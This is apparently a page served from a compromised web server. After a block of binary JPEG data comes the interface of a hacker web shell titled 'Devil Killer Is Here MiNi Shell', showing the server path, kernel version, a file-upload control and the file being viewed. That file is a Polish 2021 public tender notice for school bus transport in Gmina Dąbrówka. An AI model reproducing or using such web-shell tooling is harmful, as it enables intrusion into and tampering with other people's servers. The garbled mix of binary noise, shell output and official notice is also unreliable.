JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210708/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210708/0010843501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00108435 z dnia 2021-07-08</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> DOWOŻENIE UCZNIÓW DO SZKÓŁ I PRZEDSZKOLI NA TERENIE GMINY DĄBRÓWKA WRAZ Z ZAPEWNIENIEM OPIEKI NAD DOWOŻONYMI DZIEĆMI – TRASA II </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA DĄBRÓWKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 550667971</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tadeusza Kościuszki 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dąbrówka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-252</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">296428255</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">297578220</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@dabrowka.net.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://dabrowka.net.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> DOWOŻENIE UCZNIÓW DO SZKÓŁ I PRZEDSZKOLI NA TERENIE GMINY DĄBRÓWKA WRAZ Z ZAPEWNIENIEM OPIEKI NAD DOWOŻONYMI DZIEĆMI – TRASA II </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-66051c12-dfce-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00108435</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00017856/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Dowożenie uczniów do szkół i przedszkoli na terenie Gminy Dąbrówka wraz z zapewnieniem opieki nad dowożonymi dziećmi - TRASA II</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/dabrowka <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/dabrowka</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem platformy zakupowej pod adresem https://platformazakupowa.pl/pn/dabrowka zwanej dalej Platformą. Szczegółowe informacje dotyczące przyjętego w postępowaniu sposobu komunikacji, znajdują się w rozdziale III podrozdziale 1 niniejszej SWZ. Instrukcja korzystania z systemu stanowi załącznik nr 8 do SWZ.<br/>Uwaga! Przed przystąpieniem do składania oferty, wykonawca jest zobowiązany zapoznać się z Instrukcją korzystania z Platformy zakupowej (załącznik nr 11 do SWZ). Instrukcja została zamieszona także bezpośrednio na ww. Platformie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Danych Osobowych (ADO), czyli<br/>podmiotem decydującym o celach i sposobach przetwarzania Pani/Pana danych osobowych jest Urząd<br/>Gminy w Dąbrówce, reprezentowany przez Wójta Gminy Dąbrówka, z siedzibą przy ul. T. Kościuszki<br/>14, 05-252 Dąbrówka. NIP: 7621450654. REGON: 000533699. Kontakt z ADO jest możliwy za pomocą<br/>poczty tradycyjnej, poczty mailowej: urzad@dabrowka.net.pl lub pod numerem telefonu: 29 757 80<br/>02.2. W Urzędzie Gminy Dąbrówka wyznaczony został Inspektor Ochrony Danych Pani Aleksandra<br/>Kiełbratowska, z którym może Pani/Pan skontaktować się za pomocą adresu e-mail: iod@odosc.pl3.<br/>Celem przetwarzania Pani/Pana danych osobowych jest:a) prowadzenie postępowania o udzielenie<br/>zamówienia lub zapytania ofertowego oraz ich archiwizacja;b) zawarcie i realizacja z Panią/Panem<br/>umowy cywilnoprawnej lub podjęcie działań na Pani/Pana żądanie przed zawarciem umowy;4.<br/>Pani/Pana dane osobowe będą przetwarzane:a) gdy jest to niezbędne do wypełnienia obowiązku<br/>prawnego ciążącego na administratorze (zgodnie z art. 6 ust. 1 lit c) RODO);b) gdy jest to niezbędne<br/>do wykonania zadania realizowanego w interesie publicznym lub w ramach sprawowania władzy<br/>publicznej powierzonej administratorowi (zgodnie z art. 6 ust. 1 lit e) RODO);c) gdy jest to niezbędne<br/>do ochrony żywotnych interesów osoby, której dane dotyczą (zgodnie z art. 6 ust. 1 lit d) RODO);d) w<br/>pozostałych przypadkach Pani/Pana dane osobowe są przetwarzane wyłącznie na podstawie<br/>wcześniej udzielonej zgody w zakresie i celu określonym w treści zgody (zgodnie z art. 6 ust. 1 lit a)<br/>RODO);.e) jeżeli Pani/Pana dane osobowe będą ujawniały pochodzenie rasowe lub etniczne, poglądy<br/>polityczne, przekonania religijne lub światopoglądowe, przynależność do związków zawodowych, lub<br/>będą danymi genetycznymi, danymi biometrycznymi lub danymi dotyczącymi zdrowia, seksualności lub<br/>orientacji seksualnej, przetwarzane będą zgodnie z art. 9 ust. 2 lit. a), f) lub j) RODO.5. Przetwarzanie<br/>dany osobowych odbywa się przede wszystkim na podstawie ustawy z dnia 29 stycznia 2004 r. –<br/>Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 ze zm. ), ustawy z dnia 23 kwietnia 1964 r. –<br/>Kodeks cywilny (Dz.U. z 2018 r., poz. 1025 ze zm.) oraz innych przepisów prawa powszechnie<br/>obowiązującego.6. Wymagamy podania przez Państwa określonego zakresu danych osobowych, który<br/>jest:a) niezbędny, aby móc wykonać zadania nałożone na Urząd Gminy Dąbrówka przez obowiązujące<br/>przepisy prawa lub wykonywania zadań realizowanych w interesie publicznym lub w ramach<br/>sprawowania władzy publicznej, jak też przetwarzać dane osobowe w celu zawarcia umowy.<br/>Niepodanie danych w zakresie wymaganym przez powszechnie obowiązujące przepisy, skutkować<br/>będzie brakiem możliwości podjęcia działań w celu właściwego rozpatrzenia sprawy. Niepodanie<br/>danych w zakresie wymaganym do zawarcia umowy cywilnoprawnej, skutkować będzie brakiem<br/>możliwości podpisania umowy.b) dobrowolny w przypadku gdy przetwarzanie danych osobowych<br/>odbywa się na podstawie zgody osoby, której dane dotyczą.7. Gwarantujemy spełnienie Państwa praw<br/>wynikających z ogólnego rozporządzenia o ochronie danych - RODO. Aby skorzystać z poniższych<br/>praw, proszę skontaktować się z Inspektorem Ochrony Danych za pośrednictwem adresu e-mail:<br/>iod@odosc.pl:a) żądania dostępu do swoich danych osobowych, ich sprostowania, usunięcia lub<br/>ograniczenia przetwarzania;b) wniesienia sprzeciwu wobec przetwarzania Pani/Pana danych<br/>osobowych;c) przenoszenia swoich danych osobowych;d) cofnięcia zgody na przetwarzanie Pani/Pana<br/>danych osobowych w dowolnym momencie bez wpływu na zgodność z prawem przetwarzania, którego<br/>dokonano na podstawie zgody przed jej cofnięciem.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Dane osobowe wykonawcy będą przetwarzane na<br/>podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie<br/>zamówienia publicznego pn. Dowożenie uczniów do szkół i przedszkoli na terenie Gminy Dąbrówka<br/>wraz z zapewnieniem opieki nad dowożonymi dziećmi.Odbiorcami przekazanych przez wykonawcę<br/>danych osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja<br/>postępowania zgodnie z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r.<br/>o dostępie do informacji publicznej.Zamawiający informuje, że:- Zamawiający udostępnia dane<br/>osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące wyroków skazujących i czynów<br/>zabronionych) w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale<br/>IX ustawy Pzp, do upływu terminu na ich wniesienie.- Udostępnianie protokołu i załączników do<br/>protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem tych, o których mowa w art.<br/>9 ust. 1 RODO (tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy<br/>polityczne, przekonania religijne lub światopoglądowe, przynależność do związków zawodowych oraz<br/>przetwarzania danych genetycznych, danych biometrycznych w celu jednoznacznego zidentyfikowania<br/>osoby fizycznej lub danych dotyczących zdrowia, seksualności lub orientacji seksualnej tej osoby),<br/>zebranych w toku postępowania o udzielenie zamówienia. - W przypadku korzystania przez osobę,której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia, o którym mowa w art. 15<br/>ust. 1–3 RODO (związanych z prawem wykonawcy do uzyskania od administratora potwierdzenia, czy<br/>przetwarzane są dane osobowe jego dotyczące, prawem wykonawcy do bycia poinformowanym o<br/>odpowiednich zabezpieczeniach, o których mowa w art. 46 RODO, związanych z przekazaniem jego<br/>danych osobowych do państwa trzeciego lub organizacji międzynarodowej oraz prawem otrzymania<br/>przez wykonawcę od administratora kopii danych osobowych podlegających przetwarzaniu),<br/>zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji,<br/>mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia.- Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia, o którym mowa<br/>w art. 16 RODO (z uprawnienia do sprostowania lub uzupełnienia danych osobowych), nie może<br/>naruszać integralności protokołu postępowania oraz jego załączników.- W postępowaniu o udzielenie<br/>zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO,<br/>nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.- W<br/>przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO<br/>spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub<br/>załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia<br/>zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IR.271.1.5.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 409584,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Dowożenie uczniów do szkół i przedszkoli na terenie Gminy Dąbrówka wraz z zapewnieniem opieki nad dowożonymi dziećmi.<br/><br/>2.	Przedmiotem zamówienia jest świadczenie usługi dowozu, odwozu i zapewnienia opieki dla uczniów uczęszczających do szkół na terenie Gminy Dąbrówka:<br/>a.	Publiczna Szkoła Podstawowa im. Cypriana Kamila Norwida w Dąbrówce<br/>Dąbrówka, ul. Kościuszki 20, 05-252 Dąbrówka,<br/>b.	Publiczna Szkoła Podstawowa im. Bitwy Warszawskiej 1920 Roku w Józefowie, Józefów, ul. Kościelna 2, 05-254 Dąbrówka,<br/>c.	Szkoła Podstawowa im. Jana Pawła II w Guzowatce, Guzowatka 81, 05-252 Dąbrówka,<br/>d.	Publiczna Szkoła Podstawowa im. Adeli Goszczyńskiej we Wszeborach, Wszebory, ul. Trakt Napoleoński 45, 05-252 Dąbrówka,<br/>e.	Przedszkole Samorządowe "Pod Wesołym Ekoludkiem" w Dręszewie Dręszew, ul. Szkolna 4, 05-252 Dąbrówka,<br/>f.	Niepubliczne Przedszkole ,,Bajkowy Świat” w Chajętach, Chajęty, ul. Wspólna 103, 05-252 Dąbrówka,<br/>g.	Przedszkole Niepubliczne Wyspa Malucha, Wszebory, ul. Graniczna 4, 05-252 Dąbrówka.<br/>3.	Okres świadczenia usługi obejmuje dni nauki szkolnej w okresie: na rok szkolny 2021/2022 i 2022/2023 tj. od dnia 01.09.2021 r. do 24.06.2022 r. i od 01.09.2022r. do 23.06.2023 r. <br/>4.	Pod pojęciem dowóz rozumie się dowożenie uczniów do szkół i przedszkoli oraz odwożenie uczniów ze szkół i przedszkoli, z zastrzeżeniem możliwości zmiany godzin kursów wynikających z realnego zapotrzebowania.<br/><br/>5.	Zamawiający udostępnia dotychczas funkcjonujący harmonogram dowożenia dzieci tj. rok szkolny 2020/2021 -- załącznik nr 9<br/><br/>6.	Pod pojęciem opieka rozumie się: stałe zapewnienie warunków bezpieczeństwa i higieny w trakcie wsiadania, wysiadania i przejazdu autobusem/pojazdem, które jest niezbędne przy tego rodzaju przewozach oraz w razie potrzeby zapewnienie bezpieczeństwa podczas przechodzenia przez jezdnię. <br/><br/>7.	Dowóz uczniów do szkół odbywać się będzie we wszystkie dni nauki wynikające z kalendarza roku szkolnego, z zastrzeżeniem sytuacji nieprzewidzianych powodujących zamknięcie placówki lub placówek szkolnych /przedszkolnych. <br/><br/>8.	Świadczenie usług obejmuje transport ok. 250 uczniów (załącznik nr 5 – przewidywana liczba uczniów dojeżdżających do szkół). <br/><br/>9.	Trasy codziennego dowożenia dzieci do szkół i przedszkoli obejmują teren obwodów szkolnych Gminy Dąbrówka o łącznej długości od 170 km do 250 km dziennie, przewidywana przez Zamawiającego łączna ilość tras w czasie trwania umowy wynosi 85 330,00 km. <br/><br/>10.	Transport dzieci powinien być zorganizowany z zachowaniem obowiązujących przepisów prawa oraz zasad bezpieczeństwa w szczególności ustawy z dnia 6 września 2001 r. o transporcie drogowym Dz. U. 2019 r. poz. 2140 ze zm.<br/><br/>11.	Warunki organizacyjne przewozu uczniów zostaną szczegółowo uzgodnione po opracowaniu przez poszczególne szkoły planów nauczania,<br/>12.	Opiekunem dowożonych dzieci musi być osoba pełnoletnia, posiadająca zaświadczenie ukończenia kursu udzielania pierwszej pomocy przedmedycznej Opiekunowie w trakcie wykonywania swoich zadań muszą być ubrani w kamizelki odblaskowe. W przypadku konieczności przeprowadzenia dzieci przez jezdnię muszą posługiwać się znakiem STOP. Kierowca nie może jednocześnie pełnić funkcji opiekuna w autobusie. <br/><br/>13.	Wykonawca, zobowiązany jest do codziennego kontrolowania trzeźwości wszystkich osób uczestniczących w realizacji zamówienia tzn. kierowców i opiekunów. <br/><br/>14.	Wykonawca, w ramach umowy, zapewni nieodpłatnie przewozy uczniów na wycieczki, zawody sportowe, wyjazdy edukacyjno - kulturalne, konkursy itp. zgodnie z potrzebami zamawiającego, min. 100 km a maks. 150 km miesięcznie. Jeden kurs liczony jest jako odległość ze szkoły do celu i z powrotem. Przedmiot zamówienia nie obejmuje innych przejazdów. W przypadku niewykorzystania limitu kilometrów, niewykorzystana liczba kilometrów przechodzi na następne miesiące. W wyjątkowych sytuacjach, w uzgodnieniu z Wykonawcą dopuszcza się wykorzystanie w danym miesiącu puli kilometrów należnych z miesiąca kolejnego. <br/><br/>15. Pojazd, którym będzie wykonywany przewóz musi posiadać aktualne badania techniczne i ubezpieczenie OC. Pojazd musi być wyposażone w automatycznie otwierane drzwi. W okresie zimowym pojazd dowożący dzieci mus być ogrzewany, na stopniach wejściowych do autobusów nie może zalegać śnieg ani lód. W tym czasie Wykonawca musi zwrócić szczególną uwagę, aby zapewnić bezpieczeństwo podczas wsiadania, wysiadania i przeprowadzania przez jezdnię dzieci. W okresie letnim autobus musi być efektywnie klimatyzowany. Przez cały rok w autobusie musi być utrzymywana czystość. <br/><br/><br/>16.	Wykonawca zobowiązany jest realizować zamówienie z wykorzystaniem zgłoszonego w ofercie pojazdu. Na etapie realizacji umowy zgłoszony pojazd może zostać zastąpiony innym, o nie niższych parametrach (np. pojazd zgłoszony w ofercie z rocznika 2014 musi zostać zastąpiony pojazdem z rocznika 2014 lub młodszym).<br/><br/>17.	Zamawiający dopuści zmianę zaoferowanego środka transportu w trakcie realizacji umowy na pisemny umotywowany wniosek Wykonawcy. Zmiana pojazdu na pojazd o mniejszej ilości miejsc siedzących może mieć miejsce w przypadku mniejszej ilości uczniów na trasach dowożenia dzieci. Pojazd zaoferowany jako zamienny nie może być starszy od pojazdu zamienianego oraz musi posiadać ważną polisę OC oraz NNW o także ważne badania techniczne. Zmiana środka transportu nie powoduje zmiany wysokości wynagrodzenia Wykonawcy. Zmiana środka transportu będzie każdorazowo zależna od decyzji Zamawiającego.<br/><br/>18.	Zamawiający każdorazowo poinformuje Wykonawcę o wystąpieniu okoliczności uzasadniających wprowadzenie ewentualnych zmian w rozkładzie jazdy ( np. zmiana godzin zajęć lekcyjnych, zmiana liczby przewożonych dzieci, inne zdarzenia mogące mieć wpływ na realizację rozkładu jazdy w danym dniu/ okresie). Wykonawca może zaproponować Zamawiającemu zmiany w rozkładzie jazdy jeżeli będzie to korzystne dla przewożonych uczniów i wprowadzić je, po zaakceptowaniu przez Zamawiającego. <br/><br/>19.	Zamawiający zastrzega możliwość odwołania poszczególnych kursów lub całkowitego odwołania dowozów w konkretne dni, wynikające ze szczególnych lub nieprzewidzianych okoliczności. <br/><br/>20.	Wykonawca otrzyma od Zamawiającego listy uczniów korzystających z dowozu raz ze wskazanymi miejscami wsiadania i wysiadania. Liczba dzieci objętych dowozem może ulec zmianie z przyczyn niezależnych od Zamawiającego. <br/><br/>21.	Wykonawca zobowiązuje się , iż przewozy uczniów realizowane w ramach niniejszej mowy, nie będą łączone ze świadczeniem przez Wykonawcę innych usług, a w szczególności podczas wykonywania dowożenia uczniów Wykonawca nie będzie dokonywał przewozów innych osób niż objęte umową.<br/><br/>Wszystkie wymagania określone w dokumentach wskazanych powyżej stanowią wymagania minimalne, a ich spełnienie jest obligatoryjne. Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty jako niezgodnej z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2023-06-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień na podstawie art. 214 ust. 1 pkt 7 i 8 ustawy Pzp - zamówienia polegającego na powtórzeniu podobnych usług.<br/><br/>Zakres zamówienia na podobne usługi/roboty budowlane:<br/>– dowóz dzieci do szkół i przedszkoli. Zamówienie polegające na powtórzeniu podobnych usług może stanowić nie więcej niż 20 % zamówienia podstawowego .<br/><br/>Zamawiający uwzględnił całkowitą wartość tego zamówienia przy obliczaniu wartości niniejszego zamówienia publicznego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteria oceny ofert - zamawiający uzna oferty za spełniające wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli:<br/>1.1.	oferta, spełnia wymagania określone niniejszą specyfikacją,<br/>1.2.	oferta została złożona, w określonym przez zamawiającego terminie,<br/>1.3.	wykonawca przedstawił ofertę zgodną co do treści z wymaganiami zamawiającego.<br/>2. Kryteria oceny ofert - stosowanie matematycznych obliczeń przy ocenie ofert, stanowi 